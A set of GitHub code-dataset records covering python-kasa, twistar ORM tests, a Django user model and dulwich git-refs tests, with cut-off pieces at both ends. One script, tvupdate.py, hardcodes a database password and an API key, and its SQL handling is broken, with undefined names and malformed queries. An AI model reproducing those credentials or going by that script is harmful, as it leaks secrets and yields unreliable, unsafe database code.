= [\n \"voltage_mv\",\n \"power_mw\",\n \"current_ma\",\n \"energy_wh\",\n \"total_wh\",\n \"voltage\",\n \"power\",\n \"current\",\n \"total\",\n \"energy\",\n ]\n\n # 1. if requested data is available, return it\n if item in super().keys():\n return super().__getitem__(item)\n # otherwise decide how to convert it\n else:\n if item not in valid_keys:\n raise KeyError(item)\n if \"_\" in item: # upscale\n return super().__getitem__(item[: item.find(\"_\")]) * 1000\n else: # downscale\n for i in super().keys():\n if i.startswith(item):\n return self.__getitem__(i) / 1000\n\n _LOGGER.debug(f\"Unable to find value for '{item}'\")\n return None\n","repo_name":"python-kasa/python-kasa","sub_path":"kasa/emeterstatus.py","file_name":"emeterstatus.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":955,"dataset":"github-code","pt":"68"} +{"seq_id":"18783647753","text":"w_in_m = float(input())\nh_in_m = float(input())\n\nw_in_cm = w_in_m * 100\nh_in_cm = h_in_m * 100\n\nh_without_coridor = h_in_cm - 100\ncount_desk_in_row = h_without_coridor // 70\ncount_rows = w_in_cm // 120\n\ncount_places = count_desk_in_row * count_rows - 3\n\nprint(count_places)","repo_name":"mKasapova/my-repo","sub_path":"PycharmProjects/Exercise1/exercises/training_lab.py","file_name":"training_lab.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24665464439","text":"from __future__ import absolute_import\nfrom twisted.trial import unittest\nfrom twisted.internet.defer import inlineCallbacks\n\nfrom twistar.exceptions import ReferenceNotSavedError\n\nfrom .utils import Boy, Girl, tearDownDB, initDB, Registry, Comment, Category\nfrom .utils import User, Avatar, Picture, FavoriteColor, Nickname, Blogpost\nfrom six.moves import range\n\n\nclass RelationshipTest(unittest.TestCase):\n @inlineCallbacks\n def setUp(self):\n yield initDB(self)\n self.user = yield User(first_name=\"First\", last_name=\"Last\", age=10).save()\n self.avatar = yield Avatar(name=\"an avatar name\", user_id=self.user.id).save()\n self.picture = yield Picture(name=\"a pic\", size=10, user_id=self.user.id).save()\n self.favcolor = yield FavoriteColor(name=\"blue\").save()\n self.boy = yield Boy(name=\"Robert\").save()\n self.girl = yield Girl(name=\"Susan\").save()\n self.config = Registry.getConfig()\n\n\n @inlineCallbacks\n def tearDown(self):\n yield tearDownDB(self)\n\n\n @inlineCallbacks\n def test_polymorphic_get(self):\n bob = yield Nickname(value=\"Bob\", nicknameable_id=self.boy.id, nicknameable_type=\"Boy\").save()\n sue = yield Nickname(value=\"Sue\", nicknameable_id=self.girl.id, nicknameable_type=\"Girl\").save()\n\n nicknames = yield self.boy.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], bob)\n self.assertEqual(nicknames[0].value, bob.value)\n\n nicknames = yield self.girl.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], sue)\n self.assertEqual(nicknames[0].value, sue.value)\n\n boy = yield bob.nicknameable.get()\n self.assertEqual(boy, self.boy)\n\n girl = yield sue.nicknameable.get()\n self.assertEqual(girl, self.girl)\n\n\n @inlineCallbacks\n def test_polymorphic_set(self):\n nicknameone = yield Nickname(value=\"Bob\").save()\n nicknametwo = yield Nickname(value=\"Bobby\").save()\n yield self.boy.nicknames.set([nicknametwo, nicknameone])\n\n nicknames = yield self.boy.nicknames.get()\n self.assertEqual(len(nicknames), 2)\n # since the insert is asynchronous - two may have been inserted\n # before one\n if not nicknames[0] == nicknametwo:\n self.assertEqual(nicknames[0], nicknameone)\n if not nicknames[1] == nicknameone:\n self.assertEqual(nicknames[1], nicknametwo)\n\n boy = yield nicknameone.nicknameable.get()\n self.assertEqual(boy, self.boy)\n\n nickname = yield Nickname(value=\"Suzzy\").save()\n yield nickname.nicknameable.set(self.girl)\n nicknames = yield self.girl.nicknames.get()\n self.assertEqual(len(nicknames), 1)\n self.assertEqual(nicknames[0], nickname)\n self.assertEqual(nicknames[0].value, nickname.value)\n\n\n @inlineCallbacks\n def test_belongs_to(self):\n user = yield self.picture.user.get()\n self.assertEqual(user, self.user)\n\n\n @inlineCallbacks\n def test_set_belongs_to(self):\n user = yield User(first_name=\"new one\").save()\n yield self.picture.user.set(user)\n self.assertEqual(user.id, self.picture.user_id)\n\n\n @inlineCallbacks\n def test_set_on_unsaved(self):\n yield User(first_name=\"new one\").save()\n picture = Picture(name=\"a pic\")\n self.assertRaises(ReferenceNotSavedError, getattr, picture, 'user')\n\n\n @inlineCallbacks\n def test_clear_belongs_to(self):\n picture = yield Picture(name=\"a pic\", size=10, user_id=self.user.id).save()\n yield picture.user.clear()\n user = yield picture.user.get()\n self.assertEqual(user, None)\n yield picture.refresh()\n user = yield picture.user.get()\n self.assertEqual(user, None)\n\n\n @inlineCallbacks\n def test_has_many(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n pics = yield self.user.pictures.get()\n picids = [p.id for p in pics]\n self.assertEqual(ids, picids)\n\n\n @inlineCallbacks\n def test_has_many_count(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n totalnum = yield self.user.pictures.count()\n self.assertEqual(totalnum, 4)\n\n\n @inlineCallbacks\n def test_has_many_count_nocache(self):\n # First, count comments\n totalnum = yield self.user.comments.count()\n self.assertEqual(totalnum, 0)\n\n for _ in range(3):\n yield Comment(user_id=self.user.id).save()\n\n totalnum = yield self.user.comments.count()\n self.assertEqual(totalnum, 3)\n\n\n @inlineCallbacks\n def test_has_many_get_with_args(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n pics = yield self.user.pictures.get(where=['name = ?', 'a pic'])\n self.assertEqual(len(pics), 1)\n self.assertEqual(pics[0].name, 'a pic')\n\n\n @inlineCallbacks\n def test_has_many_count_with_args(self):\n # First, make a few pics\n ids = [self.picture.id]\n for _ in range(3):\n pic = yield Picture(user_id=self.user.id).save()\n ids.append(pic.id)\n\n picsnum = yield self.user.pictures.count(where=['name = ?', 'a pic'])\n self.assertEqual(picsnum, 1)\n\n\n @inlineCallbacks\n def test_set_has_many(self):\n # First, make a few pics\n pics = [self.picture]\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n picids = [int(p.id) for p in pics]\n\n yield self.user.pictures.set(pics)\n results = yield self.user.pictures.get()\n resultids = [int(p.id) for p in results]\n picids.sort()\n resultids.sort()\n self.assertEqual(picids, resultids)\n\n # now try resetting\n pics = []\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n picids = [p.id for p in pics]\n\n yield self.user.pictures.set(pics)\n results = yield self.user.pictures.get()\n resultids = [p.id for p in results]\n self.assertEqual(picids, resultids)\n\n\n @inlineCallbacks\n def test_clear_has_many(self):\n pics = [self.picture]\n for _ in range(3):\n pic = yield Picture(name=\"a pic\").save()\n pics.append(pic)\n\n yield self.user.pictures.set(pics)\n yield self.user.pictures.clear()\n\n userpics = yield self.user.pictures.get()\n self.assertEqual(userpics, [])\n\n # even go so far as to refetch user\n yield User.find(self.user.id)\n userpics = yield self.user.pictures.get()\n self.assertEqual(userpics, [])\n\n # picture records should be updated\n pics = yield Picture.find(where=[\"user_id=?\", self.user.id])\n self.assertEqual(pics, [])\n\n # but still exist\n pics = yield Picture.all()\n self.assertEqual(len(pics), 4)\n\n\n @inlineCallbacks\n def test_has_one(self):\n avatar = yield self.user.avatar.get()\n self.assertEqual(avatar, self.avatar)\n\n\n @inlineCallbacks\n def test_set_has_one(self):\n avatar = yield Avatar(name=\"another\").save()\n yield self.user.avatar.set(avatar)\n yield avatar.refresh()\n self.assertEqual(avatar.user_id, self.user.id)\n\n\n @inlineCallbacks\n def test_habtm(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n colorids = [c.id for c in colors]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolors = yield self.user.favorite_colors.get()\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, colorids)\n\n\n @inlineCallbacks\n def test_habtm_with_joinwhere(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id, 'palette_id': 1}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id, 'palette_id': 2}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolors = yield self.user.favorite_colors.get(join_where=['palette_id = ?', 2])\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, [colors[1].id])\n\n\n @inlineCallbacks\n def test_habtm_count(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n yield FavoriteColor(name=\"green\").save()\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolorsnum = yield self.user.favorite_colors.count()\n self.assertEqual(newcolorsnum, 2)\n\n\n @inlineCallbacks\n def test_habtm_get_with_args(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolor = yield self.user.favorite_colors.get(where=['name = ?', 'red'], limit=1)\n self.assertEqual(newcolor.id, color.id)\n\n\n @inlineCallbacks\n def test_habtm_count_with_args(self):\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n args = {'user_id': self.user.id, 'favorite_color_id': colors[0].id}\n yield self.config.insert('favorite_colors_users', args)\n args = {'user_id': self.user.id, 'favorite_color_id': colors[1].id}\n yield self.config.insert('favorite_colors_users', args)\n\n newcolorsnum = yield self.user.favorite_colors.count(where=['name = ?', 'red'])\n self.assertEqual(newcolorsnum, 1)\n\n\n @inlineCallbacks\n def test_set_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n colorids = [c.id for c in colors]\n\n yield user.favorite_colors.set(colors)\n newcolors = yield user.favorite_colors.get()\n newcolorids = [c.id for c in newcolors]\n self.assertEqual(newcolorids, colorids)\n\n\n @inlineCallbacks\n def test_clear_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n yield user.favorite_colors.clear()\n colors = yield user.favorite_colors.get()\n self.assertEqual(colors, [])\n\n\n @inlineCallbacks\n def test_clear_jointable_on_delete_habtm(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n old_id = color.id\n yield color.delete()\n result = yield self.config.select('favorite_colors_users', where=['favorite_color_id = ?', old_id], limit=1)\n self.assertTrue(result is None)\n\n\n @inlineCallbacks\n def test_clear_jointable_on_delete_habtm_with_custom_args(self):\n join_tablename = 'posts_categories'\n post = yield Blogpost(title='headline').save()\n category = yield Category(name=\"personal\").save()\n\n yield post.categories.set([category])\n cat_id = category.id\n yield category.delete()\n res = yield self.config.select(join_tablename, where=['category_id = ?', cat_id], limit=1)\n self.assertIsNone(res)\n\n\n @inlineCallbacks\n def test_set_habtm_blank(self):\n user = yield User().save()\n color = yield FavoriteColor(name=\"red\").save()\n colors = [self.favcolor, color]\n\n yield user.favorite_colors.set(colors)\n # now blank out\n yield user.favorite_colors.set([])\n newcolors = yield user.favorite_colors.get()\n self.assertEqual(len(newcolors), 0)\n","repo_name":"bmuller/twistar","sub_path":"twistar/tests/test_relationships.py","file_name":"test_relationships.py","file_ext":"py","file_size_in_byte":12978,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"68"} +{"seq_id":"24797148074","text":"from django.utils import timezone\nfrom datetime import date, datetime, time, timedelta\nfrom time import mktime\nfrom pytvdbapi import api\nimport feedparser\nimport MySQLdb\nconnection=MySQLdb.connect(\n host='localhost',user='aristia',passwd='Petransikey18',db='aristia')\ncursor=connection.cursor()\n\ndt0 = timezone.make_aware(datetime.combine(today - timedelta(days=2), time.min))\ndt1 = timezone.make_aware(datetime.combine(today - timedelta(days=30), time.min))\ndt3 = timezone.make_aware(datetime.combine(today - timedelta(days=500), time.min))\n\nmodule_dir = os.path.dirname(__file__) # get current directory\n\ndb = api.TVDB(\"D620620B2C727377\", banners=True)\n\n#series = Series.objects.filter(lastlookup__lt=dt0)\nsql=\"SELECT id,title FROM shows_series WHERE lastlookup < '%s'\" ,(dt0)\ncursor.execute(sql)\nseries=cursor.fetchall()\n\n\nfor show in series:\n result = db.search(show.title,\"en\")\n tvdbshow = result[0]\n for tvdbseason in tvdbshow:\n for tvdbepi in tvdbseason:\n\n #Episode.objects.filter(due__lte=dt3).delete()# delete old episodes\n try:\n AiredDT = timezone.make_aware(datetime.combine(tvdbepi.FirstAired, time.min))\n except:\n AiredDT = None\n if AiredDT is not None and AiredDT > dt1:\n try:\n sql=\"SELECT * FROM shows_episodes WHERE `season`= '%s', `episode`='%s', serid='%s'\" ,(tvdbepi.SeasonNumber,tvdbepi.EpisodeNumber,tvdbshow.id)\n cursor.execute(sql)\n dupe = cursor.fetchall()\n except:\n dupe = None\n if dupe is None: \n sql=\"INSERT INTO shows_episodes (`title`,`season`,`episode`,`date_added`,`due`,`desc`,`serid`,`epiid`,`seaid`,`downloaded`,`series_id`) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s',)\" , (tvdbshow.SeriesName, tvdbepi.SeasonNumber, tvdbepi.EpisodeNumber, dt_today, AiredDT, tvdbepi.Overview, tvdbshow.id, tvdbepi.id, tvdbepi.seasonid, dt_1000, show.id)\n cursor.execute(sql)\n\n elif dupe.due != AiredDT: \n sql=\"UPDATE shows_episodes SET `date_added`='%s', `due`='%s', `desc`='%s',`serid`='%s',`epiid`='%s', `seaid`='%s' WHERE `id` = '%s'\",(dt_today, AiredDT, tvdbepi.Overview, tvdbshow.id, tvdbepi.id, tvdbepi.seasonid, dt_1000, dupe.id)\n cursor.execute(sql)\n\n \n sql=\"UPDATE shows_series SET `lastlookup`=,`tvdbid`=,`overview`=,`firstaired`=,`imdb`= WHERE `id` = %s\" , (dt_today,tvdbshow.id,tvdbshow.Overview,timezone.make_aware(datetime.combine(tvdbshow.FirstAired, time.min)),tvdbshow.IMDB_ID,show.id)\n cursor.execute(sql)\n connection.close()","repo_name":"enfie01s/DjangoBasedWebsite","sub_path":"shows/tvupdate.py","file_name":"tvupdate.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35399823430","text":"from django.contrib.auth.base_user import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db import models\n# biblioteca para tradução do inglês para lingua definida no settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils import timezone\nfrom django.core.mail import send_mail\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"\n App base User class\n\n Email e senha são requeridos. Outros campos são opcionais\n \"\"\"\n\n first_name = models.CharField(_('first name'), max_length=30, blank=True)\n email = models.EmailField(_('email address'), unique=True) # unique é para o email só tenha um usuario\n is_staff = models.BooleanField( # is staff define os usuarios que podem acessar\n _('staff status'), # o admin do django\n default=False,\n help_text=_('Designates whether the user can log into this admin site.'),\n )\n is_active = models.BooleanField( # is_active define o usuário que pode se logar\n _('active'), # dentro do sistema\n default=True,\n help_text=_(\n 'Designates whether this user should be treated as active. '\n 'Unselect this instead of deleting accounts.'\n ),\n )\n date_joined = models.DateTimeField(_('date joined'), default=timezone.now)\n # date_joined define quando um usuário entrou no sistema\n\n #objects = UserManager()\n\n EMAIL_FIELD = 'email' # nome do campo respectivo ao email\n USERNAME_FIELD = 'email' # nome qual campo será utilizado como username\n REQUIRED_FIELDS = []\n\n class Meta:\n verbose_name = _('user')\n verbose_name_plural = _('users')\n\n def clean(self):\n super().clean()\n self.email = self.__class__.objects.normalize_email(self.email)\n\n def get_full_name(self):\n \"\"\"\n Returna o first_name.\n \"\"\"\n full_name = '%s' % (self.first_name)\n return full_name.strip()\n\n def get_short_name(self):\n \"\"\"Return o nome abreviado do usuário.\"\"\"\n return self.first_name\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Envia um email para o usuário.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n","repo_name":"fhfraga/curso-django","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19228533351","text":"import os\nimport sys\nimport tempfile\nfrom io import BytesIO\n\nfrom dulwich import errors\nfrom dulwich.tests import SkipTest, TestCase\n\nfrom ..file import GitFile\nfrom ..objects import ZERO_SHA\nfrom ..refs import (\n DictRefsContainer,\n InfoRefsContainer,\n SymrefLoop,\n _split_ref_line,\n check_ref_format,\n parse_symref_value,\n read_packed_refs,\n read_packed_refs_with_peeled,\n strip_peeled_refs,\n write_packed_refs,\n)\nfrom ..repo import Repo\nfrom .utils import open_repo, tear_down_repo\n\n\nclass CheckRefFormatTests(TestCase):\n \"\"\"Tests for the check_ref_format function.\n\n These are the same tests as in the git test suite.\n \"\"\"\n\n def test_valid(self):\n self.assertTrue(check_ref_format(b\"heads/foo\"))\n self.assertTrue(check_ref_format(b\"foo/bar/baz\"))\n self.assertTrue(check_ref_format(b\"refs///heads/foo\"))\n self.assertTrue(check_ref_format(b\"foo./bar\"))\n self.assertTrue(check_ref_format(b\"heads/foo@bar\"))\n self.assertTrue(check_ref_format(b\"heads/fix.lock.error\"))\n\n def test_invalid(self):\n self.assertFalse(check_ref_format(b\"foo\"))\n self.assertFalse(check_ref_format(b\"heads/foo/\"))\n self.assertFalse(check_ref_format(b\"./foo\"))\n self.assertFalse(check_ref_format(b\".refs/foo\"))\n self.assertFalse(check_ref_format(b\"heads/foo..bar\"))\n self.assertFalse(check_ref_format(b\"heads/foo?bar\"))\n self.assertFalse(check_ref_format(b\"heads/foo.lock\"))\n self.assertFalse(check_ref_format(b\"heads/v@{ation\"))\n self.assertFalse(check_ref_format(b\"heads/foo\\bar\"))\n\n\nONES = b\"1\" * 40\nTWOS = b\"2\" * 40\nTHREES = b\"3\" * 40\nFOURS = b\"4\" * 40\n\n\nclass PackedRefsFileTests(TestCase):\n def test_split_ref_line_errors(self):\n self.assertRaises(errors.PackedRefsException, _split_ref_line, b\"singlefield\")\n self.assertRaises(errors.PackedRefsException, _split_ref_line, b\"badsha name\")\n self.assertRaises(\n errors.PackedRefsException,\n _split_ref_line,\n ONES + b\" bad/../refname\",\n )\n\n def test_read_without_peeled(self):\n f = BytesIO(b\"\\n\".join([b\"# comment\", ONES + b\" ref/1\", TWOS + b\" ref/2\"]))\n self.assertEqual(\n [(ONES, b\"ref/1\"), (TWOS, b\"ref/2\")], list(read_packed_refs(f))\n )\n\n def test_read_without_peeled_errors(self):\n f = BytesIO(b\"\\n\".join([ONES + b\" ref/1\", b\"^\" + TWOS]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n def test_read_with_peeled(self):\n f = BytesIO(\n b\"\\n\".join(\n [\n ONES + b\" ref/1\",\n TWOS + b\" ref/2\",\n b\"^\" + THREES,\n FOURS + b\" ref/4\",\n ]\n )\n )\n self.assertEqual(\n [\n (ONES, b\"ref/1\", None),\n (TWOS, b\"ref/2\", THREES),\n (FOURS, b\"ref/4\", None),\n ],\n list(read_packed_refs_with_peeled(f)),\n )\n\n def test_read_with_peeled_errors(self):\n f = BytesIO(b\"\\n\".join([b\"^\" + TWOS, ONES + b\" ref/1\"]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n f = BytesIO(b\"\\n\".join([ONES + b\" ref/1\", b\"^\" + TWOS, b\"^\" + THREES]))\n self.assertRaises(errors.PackedRefsException, list, read_packed_refs(f))\n\n def test_write_with_peeled(self):\n f = BytesIO()\n write_packed_refs(f, {b\"ref/1\": ONES, b\"ref/2\": TWOS}, {b\"ref/1\": THREES})\n self.assertEqual(\n b\"\\n\".join(\n [\n b\"# pack-refs with: peeled\",\n ONES + b\" ref/1\",\n b\"^\" + THREES,\n TWOS + b\" ref/2\",\n ]\n )\n + b\"\\n\",\n f.getvalue(),\n )\n\n def test_write_without_peeled(self):\n f = BytesIO()\n write_packed_refs(f, {b\"ref/1\": ONES, b\"ref/2\": TWOS})\n self.assertEqual(\n b\"\\n\".join([ONES + b\" ref/1\", TWOS + b\" ref/2\"]) + b\"\\n\",\n f.getvalue(),\n )\n\n\n# Dict of refs that we expect all RefsContainerTests subclasses to define.\n_TEST_REFS = {\n b\"HEAD\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/40-char-ref-aaaaaaaaaaaaaaaaaa\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/tags/refs-0.1\": b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n b\"refs/tags/refs-0.2\": b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n b\"refs/heads/loop\": b\"ref: refs/heads/loop\",\n}\n\n\nclass RefsContainerTests:\n def test_keys(self):\n actual_keys = set(self._refs.keys())\n self.assertEqual(set(self._refs.allkeys()), actual_keys)\n self.assertEqual(set(_TEST_REFS.keys()), actual_keys)\n\n actual_keys = self._refs.keys(b\"refs/heads\")\n actual_keys.discard(b\"loop\")\n self.assertEqual(\n [b\"40-char-ref-aaaaaaaaaaaaaaaaaa\", b\"master\", b\"packed\"],\n sorted(actual_keys),\n )\n self.assertEqual(\n [b\"refs-0.1\", b\"refs-0.2\"], sorted(self._refs.keys(b\"refs/tags\"))\n )\n\n def test_iter(self):\n actual_keys = set(self._refs.keys())\n self.assertEqual(set(self._refs), actual_keys)\n self.assertEqual(set(_TEST_REFS.keys()), actual_keys)\n\n def test_as_dict(self):\n # refs/heads/loop does not show up even if it exists\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, self._refs.as_dict())\n\n def test_get_symrefs(self):\n self._refs.set_symbolic_ref(b\"refs/heads/src\", b\"refs/heads/dst\")\n symrefs = self._refs.get_symrefs()\n if b\"HEAD\" in symrefs:\n symrefs.pop(b\"HEAD\")\n self.assertEqual(\n {\n b\"refs/heads/src\": b\"refs/heads/dst\",\n b\"refs/heads/loop\": b\"refs/heads/loop\",\n },\n symrefs,\n )\n\n def test_setitem(self):\n self._refs[b\"refs/some/ref\"] = b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/some/ref\"],\n )\n self.assertRaises(\n errors.RefFormatError,\n self._refs.__setitem__,\n b\"notrefs/foo\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n def test_set_if_equals(self):\n nines = b\"9\" * 40\n self.assertFalse(self._refs.set_if_equals(b\"HEAD\", b\"c0ffee\", nines))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", self._refs[b\"HEAD\"]\n )\n\n self.assertTrue(\n self._refs.set_if_equals(\n b\"HEAD\", b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", nines\n )\n )\n self.assertEqual(nines, self._refs[b\"HEAD\"])\n\n # Setting the ref again is a no-op, but will return True.\n self.assertTrue(self._refs.set_if_equals(b\"HEAD\", nines, nines))\n self.assertEqual(nines, self._refs[b\"HEAD\"])\n\n self.assertTrue(self._refs.set_if_equals(b\"refs/heads/master\", None, nines))\n self.assertEqual(nines, self._refs[b\"refs/heads/master\"])\n\n self.assertTrue(\n self._refs.set_if_equals(b\"refs/heads/nonexistent\", ZERO_SHA, nines)\n )\n self.assertEqual(nines, self._refs[b\"refs/heads/nonexistent\"])\n\n def test_add_if_new(self):\n nines = b\"9\" * 40\n self.assertFalse(self._refs.add_if_new(b\"refs/heads/master\", nines))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n\n self.assertTrue(self._refs.add_if_new(b\"refs/some/ref\", nines))\n self.assertEqual(nines, self._refs[b\"refs/some/ref\"])\n\n def test_set_symbolic_ref(self):\n self._refs.set_symbolic_ref(b\"refs/heads/symbolic\", b\"refs/heads/master\")\n self.assertEqual(\n b\"ref: refs/heads/master\",\n self._refs.read_loose_ref(b\"refs/heads/symbolic\"),\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/symbolic\"],\n )\n\n def test_set_symbolic_ref_overwrite(self):\n nines = b\"9\" * 40\n self.assertNotIn(b\"refs/heads/symbolic\", self._refs)\n self._refs[b\"refs/heads/symbolic\"] = nines\n self.assertEqual(nines, self._refs.read_loose_ref(b\"refs/heads/symbolic\"))\n self._refs.set_symbolic_ref(b\"refs/heads/symbolic\", b\"refs/heads/master\")\n self.assertEqual(\n b\"ref: refs/heads/master\",\n self._refs.read_loose_ref(b\"refs/heads/symbolic\"),\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/symbolic\"],\n )\n\n def test_check_refname(self):\n self._refs._check_refname(b\"HEAD\")\n self._refs._check_refname(b\"refs/stash\")\n self._refs._check_refname(b\"refs/heads/foo\")\n\n self.assertRaises(errors.RefFormatError, self._refs._check_refname, b\"refs\")\n self.assertRaises(\n errors.RefFormatError, self._refs._check_refname, b\"notrefs/foo\"\n )\n\n def test_contains(self):\n self.assertIn(b\"refs/heads/master\", self._refs)\n self.assertNotIn(b\"refs/heads/bar\", self._refs)\n\n def test_delitem(self):\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n del self._refs[b\"refs/heads/master\"]\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/heads/master\"])\n\n def test_remove_if_equals(self):\n self.assertFalse(self._refs.remove_if_equals(b\"HEAD\", b\"c0ffee\"))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", self._refs[b\"HEAD\"]\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/tags/refs-0.2\",\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n )\n )\n self.assertTrue(self._refs.remove_if_equals(b\"refs/tags/refs-0.2\", ZERO_SHA))\n self.assertNotIn(b\"refs/tags/refs-0.2\", self._refs)\n\n def test_import_refs_name(self):\n self._refs[\n b\"refs/remotes/origin/other\"\n ] = b\"48d01bd4b77fed026b154d16493e5deab78f02ec\"\n self._refs.import_refs(\n b\"refs/remotes/origin\",\n {b\"master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/master\"],\n )\n self.assertEqual(\n b\"48d01bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/other\"],\n )\n\n def test_import_refs_name_prune(self):\n self._refs[\n b\"refs/remotes/origin/other\"\n ] = b\"48d01bd4b77fed026b154d16493e5deab78f02ec\"\n self._refs.import_refs(\n b\"refs/remotes/origin\",\n {b\"master\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n prune=True,\n )\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/remotes/origin/master\"],\n )\n self.assertNotIn(b\"refs/remotes/origin/other\", self._refs)\n\n\nclass DictRefsContainerTests(RefsContainerTests, TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self._refs = DictRefsContainer(dict(_TEST_REFS))\n\n def test_invalid_refname(self):\n # FIXME: Move this test into RefsContainerTests, but requires\n # some way of injecting invalid refs.\n self._refs._refs[b\"refs/stash\"] = b\"00\" * 20\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"refs/heads/loop\"]\n expected_refs[b\"refs/stash\"] = b\"00\" * 20\n self.assertEqual(expected_refs, self._refs.as_dict())\n\n\nclass DiskRefsContainerTests(RefsContainerTests, TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self._repo = open_repo(\"refs.git\")\n self.addCleanup(tear_down_repo, self._repo)\n self._refs = self._repo.refs\n\n def test_get_packed_refs(self):\n self.assertEqual(\n {\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n b\"refs/tags/refs-0.1\": b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n },\n self._refs.get_packed_refs(),\n )\n\n def test_get_peeled_not_packed(self):\n # not packed\n self.assertEqual(None, 